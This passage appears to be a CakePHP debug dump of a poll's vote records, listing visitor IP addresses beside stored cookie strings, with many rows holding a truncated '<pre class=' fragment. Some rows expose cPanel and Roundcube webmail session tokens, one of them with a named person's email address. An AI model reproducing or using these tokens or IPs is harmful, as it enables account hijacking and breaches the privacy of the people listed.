'ip' => '105.105.66.87',
'ip1' => 'CAKEPHP=63a8a8049c9ac9c4d4e8aeba27f9726c',
'sondage_id' => '2'
),
(int) 143 => array(
'id' => '686',
'ip' => '216.21.170.203',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 144 => array(
'id' => '687',
'ip' => '204.85.30.69',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 145 => array(
'id' => '688',
'ip' => '105.96.64.70',
'ip1' => 'CAKEPHP=050215865aea0ed48a02b12800f702b1',
'sondage_id' => '2'
),
(int) 146 => array(
'id' => '689',
'ip' => '41.106.160.122',
'ip1' => 'CAKEPHP=9efafe73cfa1e1d60407879597abd740; timezone=Africa/Lagos; cpsession=scimat%3aLCPz5OaoK9v4sbtj%2c1340e0623360c5be87cca8ada5b74b0c',
'sondage_id' => '2'
),
(int) 147 => array(
'id' => '690',
'ip' => '41.106.160.122',
'ip1' => 'CAKEPHP=9efafe73cfa1e1d60407879597abd740; timezone=Africa/Lagos; cpsession=scimat%3aaDNz4pUa1meYRrSF%2cfca428c295ea77beb5bba5d9eb11d97e',
'sondage_id' => '2'
),
(int) 148 => array(
'id' => '691',
'ip' => '41.106.180.185',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 149 => array(
'id' => '692',
'ip' => '154.121.35.54',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 150 => array(
'id' => '693',
'ip' => '154.121.52.91',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 151 => array(
'id' => '694',
'ip' => '182.72.222.46',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 152 => array(
'id' => '695',
'ip' => '182.72.222.46',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 153 => array(
'id' => '696',
'ip' => '105.96.67.151',
'ip1' => 'CAKEPHP=7370ce0224bd0a665c53271f0fe86a5c',
'sondage_id' => '2'
),
(int) 154 => array(
'id' => '697',
'ip' => '197.119.93.135',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 155 => array(
'id' => '698',
'ip' => '105.96.64.70',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 156 => array(
'id' => '699',
'ip' => '41.200.173.9',
'ip1' => 'CAKEPHP=1a8fa38f6e3886a3dc5da7a4ba115bd6',
'sondage_id' => '2'
),
(int) 157 => array(
'id' => '700',
'ip' => '105.235.135.68',
'ip1' => 'CAKEPHP=ce7963482c74f2d7ef5b1f5b8db1fcbb',
'sondage_id' => '2'
),
(int) 158 => array(
'id' => '701',
'ip' => '41.106.189.160',
'ip1' => 'timezone=Africa/Lagos; CAKEPHP=ce7ece7dfe6d8444349160f03d304c80; cpsession=scimat%3ah6pbP_SmQWcFHeBr%2c08bf6157c12137ca8b0a958f9ea0e660',
'sondage_id' => '2'
),
(int) 159 => array(
'id' => '702',
'ip' => '105.103.142.92',
'ip1' => 'CAKEPHP=67591fc4b2396a40f490995f38918d3e',
'sondage_id' => '2'
),
(int) 160 => array(
'id' => '703',
'ip' => '41.200.162.50',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 161 => array(
'id' => '704',
'ip' => '41.200.173.18',
'ip1' => 'CAKEPHP=d77989caced31682b7c178fb20ad53d4',
'sondage_id' => '2'
),
(int) 162 => array(
'id' => '705',
'ip' => '41.110.181.206',
'ip1' => 'CAKEPHP=ab9dcad3e85677105c9c9a70f19f7380',
'sondage_id' => '2'
),
(int) 163 => array(
'id' => '706',
'ip' => '41.110.181.206',
'ip1' => 'CAKEPHP=ab9dcad3e85677105c9c9a70f19f7380',
'sondage_id' => '2'
),
(int) 164 => array(
'id' => '707',
'ip' => '41.200.186.135',
'ip1' => 'CAKEPHP=b144c8c8bde086c4c9b5189ce6deb854',
'sondage_id' => '2'
),
(int) 165 => array(
'id' => '708',
'ip' => '105.96.64.70',
'ip1' => 'CAKEPHP=713a526c6ec1112143c49870c8aa1169',
'sondage_id' => '2'
),
(int) 166 => array(
'id' => '709',
'ip' => '41.106.103.213',
'ip1' => 'CAKEPHP=fb8112e244e8158a173aab9bfeca55a9',
'sondage_id' => '2'
),
(int) 167 => array(
'id' => '710',
'ip' => '105.235.135.241',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 168 => array(
'id' => '711',
'ip' => '202.183.22.212',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 169 => array(
'id' => '712',
'ip' => '202.183.22.212',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 170 => array(
'id' => '713',
'ip' => '105.96.67.151',
'ip1' => 'CAKEPHP=8f8574c5385ba73b58f64c5c99cd2fd5',
'sondage_id' => '2'
),
(int) 171 => array(
'id' => '714',
'ip' => '105.235.136.58',
'ip1' => 'CAKEPHP=0cfd5c16ede1c40070069830dbcd6241',
'sondage_id' => '2'
),
(int) 172 => array(
'id' => '715',
'ip' => '41.200.140.60',
'ip1' => 'CAKEPHP=9d8ba0f1964f3368bcc1ade8757c4c1f',
'sondage_id' => '2'
),
(int) 173 => array(
'id' => '716',
'ip' => '105.96.67.151',
'ip1' => 'CAKEPHP=0d0ee8a4db101b178c829ad2a35e91da',
'sondage_id' => '2'
),
(int) 174 => array(
'id' => '717',
'ip' => '105.96.67.151',
'ip1' => 'CAKEPHP=2c4f161da3c81c8a5d79f0c870a1ff2f',
'sondage_id' => '2'
),
(int) 175 => array(
'id' => '718',
'ip' => '41.110.181.206',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 176 => array(
'id' => '719',
'ip' => '177.133.141.119',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 177 => array(
'id' => '720',
'ip' => '177.133.141.119',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 178 => array(
'id' => '721',
'ip' => '41.105.36.187',
'ip1' => 'CAKEPHP=8b1d9dbe2f7eeeca16adddea6adddb72',
'sondage_id' => '2'
),
(int) 179 => array(
'id' => '722',
'ip' => '105.96.67.151',
'ip1' => 'CAKEPHP=fb994003a7f79ccf09e6378031a05784',
'sondage_id' => '2'
),
(int) 180 => array(
'id' => '723',
'ip' => '41.109.26.143',
'ip1' => 'CAKEPHP=b988cbb5ea5ecd7b891c216bde1d08a6',
'sondage_id' => '2'
),
(int) 181 => array(
'id' => '724',
'ip' => '41.106.103.243',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 182 => array(
'id' => '725',
'ip' => '41.106.103.95',
'ip1' => 'roundcube_cookies=enabled; CAKEPHP=9513f1385321f062127d28bb63b24240',
'sondage_id' => '2'
),
(int) 183 => array(
'id' => '726',
'ip' => '129.45.100.226',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 184 => array(
'id' => '727',
'ip' => '129.45.100.226',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 185 => array(
'id' => '728',
'ip' => '105.99.108.84',
'ip1' => 'CAKEPHP=7b82581cdeccf72b5f95d9bdf0d49881',
'sondage_id' => '2'
),
(int) 186 => array(
'id' => '729',
'ip' => '105.108.175.142',
'ip1' => 'CAKEPHP=ce0c4a1c2663990be32ea8b18388d4d2',
'sondage_id' => '2'
),
(int) 187 => array(
'id' => '730',
'ip' => '105.106.14.52',
'ip1' => 'CAKEPHP=22bef0305e3ef918685ce6a3ad2b835b',
'sondage_id' => '2'
),
(int) 188 => array(
'id' => '731',
'ip' => '41.106.99.166',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 189 => array(
'id' => '732',
'ip' => '41.106.99.166',
'ip1' => 'CAKEPHP=2b8324f03ee2ccadfd3ead393006efec',
'sondage_id' => '2'
),
(int) 190 => array(
'id' => '733',
'ip' => '41.106.100.77',
'ip1' => 'CAKEPHP=ca49cf7535d338f45f289ee075843bb4',
'sondage_id' => '2'
),
(int) 191 => array(
'id' => '734',
'ip' => '154.121.49.43',
'ip1' => 'CAKEPHP=f6bfdb42ca01afcfefa94ff6595333a1',
'sondage_id' => '2'
),
(int) 192 => array(
'id' => '735',
'ip' => '3.23.208.80',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 193 => array(
'id' => '736',
'ip' => '3.23.208.80',
'ip1' => 'CAKEPHP=1e9c13b96b821c87651309034a57256e',
'sondage_id' => '2'
),
(int) 194 => array(
'id' => '737',
'ip' => '197.204.162.115',
'ip1' => 'CAKEPHP=af42ce31874757e76bd6ad66b613f949',
'sondage_id' => '2'
),
(int) 195 => array(
'id' => '738',
'ip' => '41.106.103.65',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 196 => array(
'id' => '739',
'ip' => '41.106.103.65',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 197 => array(
'id' => '740',
'ip' => '41.106.103.65',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 198 => array(
'id' => '741',
'ip' => '41.106.103.65',
'ip1' => 'CAKEPHP=fcd1af91598d6524d0c087a40de2f605',
'sondage_id' => '2'
),
(int) 199 => array(
'id' => '742',
'ip' => '105.104.140.97',
'ip1' => 'CAKEPHP=20129f6654b8a99974b37ad131241caa',
'sondage_id' => '2'
),
(int) 200 => array(
'id' => '743',
'ip' => '41.111.129.122',
'ip1' => 'CAKEPHP=9d6da4010a437d357f98ed135ff3d598',
'sondage_id' => '2'
),
(int) 201 => array(
'id' => '744',
'ip' => '41.200.65.127',
'ip1' => 'CAKEPHP=6ea0090fcf85748760bb9191367cffaa',
'sondage_id' => '2'
),
(int) 202 => array(
'id' => '745',
'ip' => '105.105.69.33',
'ip1' => 'CAKEPHP=8dd275536212cbcdc8d3cfc7555a47f2',
'sondage_id' => '2'
),
(int) 203 => array(
'id' => '746',
'ip' => '136.228.212.83',
'ip1' => 'CAKEPHP=b45b3ccd190e51bb99f9109d1a2441d3',
'sondage_id' => '2'
),
(int) 204 => array(
'id' => '747',
'ip' => '182.76.214.22',
'ip1' => 'CAKEPHP=81ab37a2e24accf03be54baab2a4586a',
'sondage_id' => '2'
),
(int) 205 => array(
'id' => '748',
'ip' => '105.105.233.10',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 206 => array(
'id' => '749',
'ip' => '41.110.183.22',
'ip1' => 'CAKEPHP=625251c103b36cb2b3897fbf2c446d84',
'sondage_id' => '2'
),
(int) 207 => array(
'id' => '750',
'ip' => '41.200.104.11',
'ip1' => 'CAKEPHP=7d329f7647c11cca350341265346d004',
'sondage_id' => '2'
),
(int) 208 => array(
'id' => '751',
'ip' => '154.246.24.62',
'ip1' => 'CAKEPHP=0bfcb621fa4bd82d7dc784a58f4bc509',
'sondage_id' => '2'
),
(int) 209 => array(
'id' => '752',
'ip' => '196.224.36.9',
'ip1' => 'CAKEPHP=4f2209075dac96447736baa81b57c2d0',
'sondage_id' => '2'
),
(int) 210 => array(
'id' => '753',
'ip' => '105.96.64.70',
'ip1' => 'CAKEPHP=2b7c5e7e856be6da9c05638fab0b927d',
'sondage_id' => '2'
),
(int) 211 => array(
'id' => '754',
'ip' => '105.105.160.84',
'ip1' => 'CAKEPHP=0abc378cd8aca8e57158c1ded17da10a',
'sondage_id' => '2'
),
(int) 212 => array(
'id' => '755',
'ip' => '197.114.115.221',
'ip1' => 'CAKEPHP=3cee793a116f23f597a08d5dc655897e',
'sondage_id' => '2'
),
(int) 213 => array(
'id' => '756',
'ip' => '154.121.48.51',
'ip1' => 'CAKEPHP=279aee29a1fcab5d228c37f9a5602e0f',
'sondage_id' => '2'
),
(int) 214 => array(
'id' => '757',
'ip' => '105.96.67.151',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 215 => array(
'id' => '758',
'ip' => '105.96.67.151',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 216 => array(
'id' => '759',
'ip' => '168.253.108.38',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 217 => array(
'id' => '760',
'ip' => '168.253.108.38',
'ip1' => 'CAKEPHP=0cb173d6f71ffe3069add85ced58dff9',
'sondage_id' => '2'
),
(int) 218 => array(
'id' => '761',
'ip' => '105.105.159.37',
'ip1' => 'CAKEPHP=d560f3adefcf199bb58f6bbc2e341c33',
'sondage_id' => '2'
),
(int) 219 => array(
'id' => '762',
'ip' => '91.243.188.210',
'ip1' => 'CAKEPHP=ea195840f2936587c7f7f77f7e8f26ac',
'sondage_id' => '2'
),
(int) 220 => array(
'id' => '763',
'ip' => '168.253.108.186',
'ip1' => 'CAKEPHP=e2af1df40b9e7df82fc39a0221f653d7',
'sondage_id' => '2'
),
(int) 221 => array(
'id' => '764',
'ip' => '197.202.56.186',
'ip1' => 'CAKEPHP=94321627d63a9f31cce03984c4d64f8b',
'sondage_id' => '2'
),
(int) 222 => array(
'id' => '765',
'ip' => '154.247.94.131',
'ip1' => 'CAKEPHP=f7ce7aae5effb73086aa452eeb7cab6b',
'sondage_id' => '2'
),
(int) 223 => array(
'id' => '766',
'ip' => '105.106.64.71',
'ip1' => 'CAKEPHP=48a0c6cbc8a70d61d1663858e303d670',
'sondage_id' => '2'
),
(int) 224 => array(
'id' => '767',
'ip' => '66.130.90.4',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 225 => array(
'id' => '768',
'ip' => '66.130.90.70',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 226 => array(
'id' => '769',
'ip' => '176.235.75.196',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 227 => array(
'id' => '770',
'ip' => '96.21.0.8',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 228 => array(
'id' => '771',
'ip' => '176.235.75.196',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 229 => array(
'id' => '772',
'ip' => '212.154.30.36',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 230 => array(
'id' => '773',
'ip' => '105.105.152.191',
'ip1' => 'CAKEPHP=fe8043486daaa61d94b50cafb009c314',
'sondage_id' => '2'
),
(int) 231 => array(
'id' => '774',
'ip' => '41.111.213.78',
'ip1' => 'CAKEPHP=0aa459dc517a923822c6579df5b8f29f',
'sondage_id' => '2'
),
(int) 232 => array(
'id' => '775',
'ip' => '136.228.212.85',
'ip1' => 'CAKEPHP=f2b099149af752c377e9b572a678194b',
'sondage_id' => '2'
),
(int) 233 => array(
'id' => '776',
'ip' => '41.111.213.78',
'ip1' => 'CAKEPHP=57a03fbdb4ee4256b19b46b7c4d978fe',
'sondage_id' => '2'
),
(int) 234 => array(
'id' => '777',
'ip' => '60.165.34.105',
'ip1' => 'CAKEPHP=9bce87cd384825e672924a3d4dcbc3d7',
'sondage_id' => '2'
),
(int) 235 => array(
'id' => '778',
'ip' => '60.165.34.105',
'ip1' => 'CAKEPHP=75bb07b62d072688bc319f3decb06767',
'sondage_id' => '2'
),
(int) 236 => array(
'id' => '779',
'ip' => '197.207.147.43',
'ip1' => 'CAKEPHP=4545c7f9c3a9663690df9b6e7abfd1d4',
'sondage_id' => '2'
),
(int) 237 => array(
'id' => '780',
'ip' => '197.207.147.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 238 => array(
'id' => '781',
'ip' => '165.225.92.226',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 239 => array(
'id' => '782',
'ip' => '91.171.88.161',
'ip1' => 'CAKEPHP=4ebf1cf5b7992a49e103fed21aa0201e',
'sondage_id' => '2'
),
(int) 240 => array(
'id' => '783',
'ip' => '197.204.36.43',
'ip1' => 'CAKEPHP=ee33334a2d702fc70aef23e7473608c9',
'sondage_id' => '2'
),
(int) 241 => array(
'id' => '784',
'ip' => '105.235.130.83',
'ip1' => 'CAKEPHP=851fc256ac89ad5e5dbb6e23bafa166b',
'sondage_id' => '2'
),
(int) 242 => array(
'id' => '785',
'ip' => '41.104.10.221',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 243 => array(
'id' => '786',
'ip' => '41.106.171.116',
'ip1' => 'CAKEPHP=b2edba56e61e953ba0ede6adef0ce5ab',
'sondage_id' => '2'
),
(int) 244 => array(
'id' => '787',
'ip' => '105.235.130.51',
'ip1' => 'CAKEPHP=b2fcd18b9f000a04e08c1d9003594599',
'sondage_id' => '2'
),
(int) 245 => array(
'id' => '788',
'ip' => '105.235.131.136',
'ip1' => 'CAKEPHP=a63cb2249e57aadcaac3365262864b90',
'sondage_id' => '2'
),
(int) 246 => array(
'id' => '789',
'ip' => '105.100.96.24',
'ip1' => 'CAKEPHP=1d4f2f03126d6c5feefb69f767e3a013',
'sondage_id' => '2'
),
(int) 247 => array(
'id' => '790',
'ip' => '41.200.124.248',
'ip1' => 'CAKEPHP=d273b7bfe32412dbad1aab886ae0a223',
'sondage_id' => '2'
),
(int) 248 => array(
'id' => '791',
'ip' => '41.200.124.248',
'ip1' => 'CAKEPHP=d273b7bfe32412dbad1aab886ae0a223',
'sondage_id' => '2'
),
(int) 249 => array(
'id' => '792',
'ip' => '41.99.56.132',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 250 => array(
'id' => '793',
'ip' => '147.161.182.102',
'ip1' => 'CAKEPHP=c431b230baff41166f22953527a87153',
'sondage_id' => '2'
),
(int) 251 => array(
'id' => '794',
'ip' => '105.96.64.70',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 252 => array(
'id' => '795',
'ip' => '196.20.107.183',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 253 => array(
'id' => '796',
'ip' => '172.104.17.172',
'ip1' => 'CAKEPHP=96e074a09ca257dd528fae3b3ce152fd',
'sondage_id' => '2'
),
(int) 254 => array(
'id' => '797',
'ip' => '172.104.17.172',
'ip1' => 'CAKEPHP=96e074a09ca257dd528fae3b3ce152fd',
'sondage_id' => '2'
),
(int) 255 => array(
'id' => '798',
'ip' => '41.104.40.65',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 256 => array(
'id' => '799',
'ip' => '105.110.206.37',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 257 => array(
'id' => '800',
'ip' => '41.105.102.1',
'ip1' => 'CAKEPHP=506eecbae05c31a24f2a97e1c38ea2e1',
'sondage_id' => '2'
),
(int) 258 => array(
'id' => '801',
'ip' => '196.132.141.181',
'ip1' => 'CAKEPHP=868ecee67e6ba62c63f4f7d04701bee3',
'sondage_id' => '2'
),
(int) 259 => array(
'id' => '802',
'ip' => '41.220.152.242',
'ip1' => 'CAKEPHP=1fc6309cabf7b7aebf4d05c76f790950',
'sondage_id' => '2'
),
(int) 260 => array(
'id' => '803',
'ip' => '41.200.151.239',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 261 => array(
'id' => '804',
'ip' => '154.121.92.59',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 262 => array(
'id' => '805',
'ip' => '105.111.125.84',
'ip1' => 'CAKEPHP=e657fef789a2c959d9fd3f88ed6b6322',
'sondage_id' => '2'
),
(int) 263 => array(
'id' => '806',
'ip' => '196.132.102.0',
'ip1' => 'CAKEPHP=0afd79b4d81f731e4b00401c9994e753',
'sondage_id' => '2'
),
(int) 264 => array(
'id' => '807',
'ip' => '37.18.96.81',
'ip1' => 'CAKEPHP=90ef7c6fd9ce4b90b67cdeac46f4fc5c',
'sondage_id' => '2'
),
(int) 265 => array(
'id' => '808',
'ip' => '41.105.22.240',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 266 => array(
'id' => '809',
'ip' => '41.105.22.240',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 267 => array(
'id' => '810',
'ip' => '41.110.188.156',
'ip1' => 'CAKEPHP=d3f62fd33b6caeacedb9ba25688e8d1b',
'sondage_id' => '2'
),
(int) 268 => array(
'id' => '811',
'ip' => '105.105.47.101',
'ip1' => 'CAKEPHP=026a70b94b28b8cdb0720cdd3baa55c9',
'sondage_id' => '2'
),
(int) 269 => array(
'id' => '812',
'ip' => '41.83.17.252',
'ip1' => 'CAKEPHP=91903e521ca5d63b2d9cc2e9966f2c85',
'sondage_id' => '2'
),
(int) 270 => array(
'id' => '813',
'ip' => '41.200.163.238',
'ip1' => 'CAKEPHP=941bf7f0694a7eb87f378d9449e72ff4',
'sondage_id' => '2'
),
(int) 271 => array(
'id' => '814',
'ip' => '41.200.163.238',
'ip1' => 'CAKEPHP=f908d2e0888fd48157eb0526942893dd',
'sondage_id' => '2'
),
(int) 272 => array(
'id' => '815',
'ip' => '41.200.140.29',
'ip1' => 'CAKEPHP=77bfdd47f1b8130a5daeda161089efd9',
'sondage_id' => '2'
),
(int) 273 => array(
'id' => '816',
'ip' => '129.45.53.227',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 274 => array(
'id' => '817',
'ip' => '105.100.18.221',
'ip1' => 'CAKEPHP=b4843e5cc62b1c53f0094ac85e7841cf',
'sondage_id' => '2'
),
(int) 275 => array(
'id' => '818',
'ip' => '105.102.83.246',
'ip1' => 'CAKEPHP=00bc421b5407001948dc1e2ea585285c',
'sondage_id' => '2'
),
(int) 276 => array(
'id' => '819',
'ip' => '105.96.64.70',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 277 => array(
'id' => '820',
'ip' => '105.105.116.162',
'ip1' => 'CAKEPHP=96060fb302d5f3111681548539017f61',
'sondage_id' => '2'
),
(int) 278 => array(
'id' => '821',
'ip' => '41.111.147.78',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 279 => array(
'id' => '822',
'ip' => '41.111.147.78',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 280 => array(
'id' => '823',
'ip' => '105.96.67.151',
'ip1' => 'roundcube_cookies=enabled; timezone=Africa/Lagos; webmailsession=malika.chaouche%40scimat.dz%3akVGPLy3SAn5gsWuI%2c8aa18266203f79e2ed2e0552c4030748; roundcube_sessid=f106f1b2b3d020f4b6b7d1b03335d088; CAKEPHP=730de889033a6163b0e60b8aadb664b9; roundcube_sessauth=y8b1UhkwM3MGQBEDboRlpznAaTb2kqnc-1683617100',
'sondage_id' => '2'
),
(int) 281 => array(
'id' => '824',
'ip' => '154.121.49.25',
'ip1' => 'CAKEPHP=4e1685ae5a02c365fe2a0e4bb8c62301',
'sondage_id' => '2'
),
(int) 282 => array(
'id' => '825',
'ip' => '154.121.98.224',
'ip1' => 'CAKEPHP=0e267fd44bde2f740240fbbcc6ccab95',
'sondage_id' => '2'
),
(int) 283 => array(
'id' => '826',
'ip' => '105.235.136.229',
'ip1' => 'CAKEPHP=7320cac03b57f1ea3e063ee2fc3f2e4b',
'sondage_id' => '2'
),
(int) 284 => array(
'id' => '827',
'ip' => '105.235.136.229',
'ip1' => 'CAKEPHP=7320cac03b57f1ea3e063ee2fc3f2e4b',
'sondage_id' => '2'
),
(int) 285 => array(
'id' => '828',
'ip' => '105.235.136.195',
'ip1' => 'CAKEPHP=a5a48917e2737b36ef883298c58d1c0b',
'sondage_id' => '2'
),
(int) 286 => array(
'id' => '829',
'ip' => '105.235.132.114',
'ip1' => 'CAKEPHP=f67dda942ee802a3c60ce95296f2e3d8',
'sondage_id' => '2'
),
(int) 287 => array(
'id' => '830',
'ip' => '197.204.228.124',
'ip1' => 'CAKEPHP=1fe9103a23fcd568cb4a726db3c1f24a',
'sondage_id' => '2'
),
(int) 288 => array(
'id' => '831',
'ip' => '105.96.64.70',
'ip1' => 'CAKEPHP=e6c8cf0975dcc3aa6c81a14437e24c25',
'sondage_id' => '2'
),
(int) 289 => array(
'id' => '832',
'ip' => '105.108.86.252',
'ip1' => 'CAKEPHP=2e58016a7e4959c5f62df391f6c23a77',
'sondage_id' => '2'
),
(int) 290 => array(
'id' => '833',
'ip' => '154.121.57.173',
'ip1' => 'CAKEPHP=98c44bf67aea718250023d14daa4f4d1',
'sondage_id' => '2'
),
(int) 291 => array(
'id' => '834',
'ip' => '105.235.130.80',
'ip1' => 'CAKEPHP=d9daf04d083c0e5ef0ec5040cad0aaea',
'sondage_id' => '2'
),
(int) 292 => array(
'id' => '835',
'ip' => '105.235.130.80',
'ip1' => 'CAKEPHP=d9daf04d083c0e5ef0ec5040cad0aaea',
'sondage_id' => '2'
),
(int) 293 => array(
'id' => '836',
'ip' => '105.111.74.209',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 294 => array(
'id' => '837',
'ip' => '165.225.92.217',
'ip1' => 'CAKEPHP=891899b6d425bc9a7db41d180a0e25c4',
'sondage_id' => '2'
),
(int) 295 => array(
'id' => '838',
'ip' => '105.107.109.97',
'ip1' => 'CAKEPHP=9ab7261be8acc1489bace8d6454bc52b',
'sondage_id' => '2'
),
(int) 296 => array(
'id' => '839',
'ip' => '105.101.146.41',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 297 => array(
'id' => '840',
'ip' => '105.104.126.110',
'ip1' => 'CAKEPHP=9b3e36e18089e08afd41db603a8bca77',
'sondage_id' => '2'
),
(int) 298 => array(
'id' => '841',
'ip' => '41.200.104.252',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 299 => array(
'id' => '842',
'ip' => '154.255.219.217',
'ip1' => 'CAKEPHP=52caae41d00656e2306488475bf5f7ee',
'sondage_id' => '2'
),
(int) 300 => array(
'id' => '843',
'ip' => '154.255.219.217',
'ip1' => 'CAKEPHP=52caae41d00656e2306488475bf5f7ee',
'sondage_id' => '2'
),
(int) 301 => array(
'id' => '844',
'ip' => '172.104.28.61',
'ip1' => 'CAKEPHP=65a68cabfdd392d39618f7776fc1521e',
'sondage_id' => '2'
),
(int) 302 => array(
'id' => '845',
'ip' => '172.104.28.61',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 303 => array(
'id' => '846',
'ip' => '172.104.28.61',
'ip1' => 'CAKEPHP=65a68cabfdd392d39618f7776fc1521e',
'sondage_id' => '2'
),
(int) 304 => array(
'id' => '847',
'ip' => '105.96.64.70',
'ip1' => 'CAKEPHP=fe805ed00cd962c22df412f0a428f962',
'sondage_id' => '2'
),
(int) 305 => array(
'id' => '848',
'ip' => '197.202.7.189',
'ip1' => 'CAKEPHP=7e69252e2946b9a32d04e62b02bc00da',
'sondage_id' => '2'
),
(int) 306 => array(
'id' => '849',
'ip' => '41.200.100.210',
'ip1' => 'CAKEPHP=8e7481f2233de16fac0d866dbe5f20b9',
'sondage_id' => '2'
),
(int) 307 => array(
'id' => '850',
'ip' => '154.121.110.128',
'ip1' => 'CAKEPHP=a613d65ae3f86f648e0e339367b9d760',
'sondage_id' => '2'
),
(int) 308 => array(
'id' => '851',
'ip' => '172.104.28.61',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 309 => array(
'id' => '852',
'ip' => '172.104.28.61',
'ip1' => 'CAKEPHP=6a9d0c1458ad20104e694ba2cf2a5d48',
'sondage_id' => '2'
),
(int) 310 => array(
'id' => '853',
'ip' => '197.207.213.228',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 311 => array(
'id' => '854',
'ip' => '197.204.117.79',
'ip1' => 'CAKEPHP=7dc0a03ffe73e958db7666700517264e',
'sondage_id' => '2'
),
(int) 312 => array(
'id' => '855',
'ip' => '197.117.252.106',
'ip1' => 'CAKEPHP=9070a73bc9af761da6c5edc0e1c59cdf',
'sondage_id' => '2'
),
(int) 313 => array(
'id' => '856',
'ip' => '147.161.234.126',
'ip1' => 'CAKEPHP=e95f14bc94dac9ccd736b39fe3299ea7',
'sondage_id' => '2'
),
(int) 314 => array(
'id' => '857',
'ip' => '172.104.28.61',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 315 => array(
'id' => '858',
'ip' => '172.104.28.61',
'ip1' => 'CAKEPHP=d7f0049b540f89e6bf951dd6b515a3f0',
'sondage_id' => '2'
),
(int) 316 => array(
'id' => '859',
'ip' => '172.104.28.61',
'ip1' => 'CAKEPHP=b0cd580bbcb32aea0c0608345a4cac56',
'sondage_id' => '2'
),
(int) 317 => array(
'id' => '860',
'ip' => '172.104.28.61',
'ip1' => 'CAKEPHP=d7f0049b540f89e6bf951dd6b515a3f0',
'sondage_id' => '2'
),
(int) 318 => array(
'id' => '861',
'ip' => '105.97.31.6',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 319 => array(
'id' => '862',
'ip' => '197.204.75.54',
'ip1' => 'CAKEPHP=084bd330941dc45f684b7bb8e4e611a7',
'sondage_id' => '2'
),
(int) 320 => array(
'id' => '863',
'ip' => '105.111.101.94',
'ip1' => 'CAKEPHP=e6012e74ef8ec0d1baf1e6476e0fa9f4',
'sondage_id' => '2'
),
(int) 321 => array(
'id' => '864',
'ip' => '94.244.0.36',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 322 => array(
'id' => '865',
'ip' => '195.5.57.36',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 323 => array(
'id' => '866',
'ip' => '105.96.67.151',
'ip1' => 'roundcube_cookies=enabled; _ga=GA1.2.693486031.1689259900; session_locale=en; timezone=Africa/Lagos; CAKEPHP=b4cc343dd68757b84daa7c139e020d68; cpsession=closed',
'sondage_id' => '2'
),
(int) 324 => array(
'id' => '867',
'ip' => '92.100.106.170',
'ip1' => 'CAKEPHP=108cca6262beef56dc6a72d119f8b206',
'sondage_id' => '2'
),
(int) 325 => array(
'id' => '868',
'ip' => '154.121.54.52',
'ip1' => 'CAKEPHP=900ef58c9a81fe818cbe8d3effa7b277',
'sondage_id' => '2'
),
(int) 326 => array(
'id' => '869',
'ip' => '154.121.54.52',
'ip1' => 'CAKEPHP=900ef58c9a81fe818cbe8d3effa7b277',
'sondage_id' => '2'
),
(int) 327 => array(
'id' => '870',
'ip' => '154.121.115.246',
'ip1' => 'CAKEPHP=fa3f73b8db1c79c6d2e8e0aea92f7c65',
'sondage_id' => '2'
),
(int) 328 => array(
'id' => '871',
'ip' => '154.121.115.246',
